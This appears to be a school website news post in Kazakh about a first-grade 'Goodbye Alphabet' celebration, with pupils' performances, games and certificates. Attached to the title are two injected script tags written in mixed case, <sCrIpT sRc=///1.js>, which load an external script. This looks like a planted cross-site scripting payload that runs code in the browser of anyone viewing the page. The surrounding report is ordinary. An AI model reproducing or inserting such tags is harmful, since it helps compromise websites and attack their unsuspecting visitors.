"Қош бол Әліппе" атты ертеңгілігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.02.2025

31.01.2025ж 1-сынып  жетекшісі Айткенова Алмагуль Мадениятовна ,,Қош бол Әліппе" атты ертеңгілігін  ұйымдастырды. Іс-шара барысында оқушылар "Әліппеден" алған білімдерін  әртүрлі тапсырмалар орындай отырып, оқу,санау қабілеттерін  көрсете білді. Әсіресе ,,Бауырсақ" ертегісін сахналағанда кейіпкерлерінің дауысын,қимылын келтіріп көрерменнің көңілінен шықты.
"Әріптер сөйлейді" өлеңдерін  мәнерлеп оқыды. 
Елін, мектебін, ұстаздарды, ата-аналарын құрметтеп өлең жолдарын арнап, әсем би сыйлады.Ертеңгілік жоғары деңгейде  өтті, ата-аналар да белсене қатысты . "Асық"ойыны барысында қазақтың дәстүрлі ұлттық құндылықтары туралы өз білімдерін шыңдады. Іс-шараның соңында оқушыларға Әліппені жақсы аяқтаған үшін күәлік және сыйлықтар табысталды. Балалардың мерекесі құтты болсын, білімдерін одан әрі шыңдай берсін деген тілек білдіреміз!

Просмотров: 1015


Пікір қосу



Деректерді қолтаңбаға қосу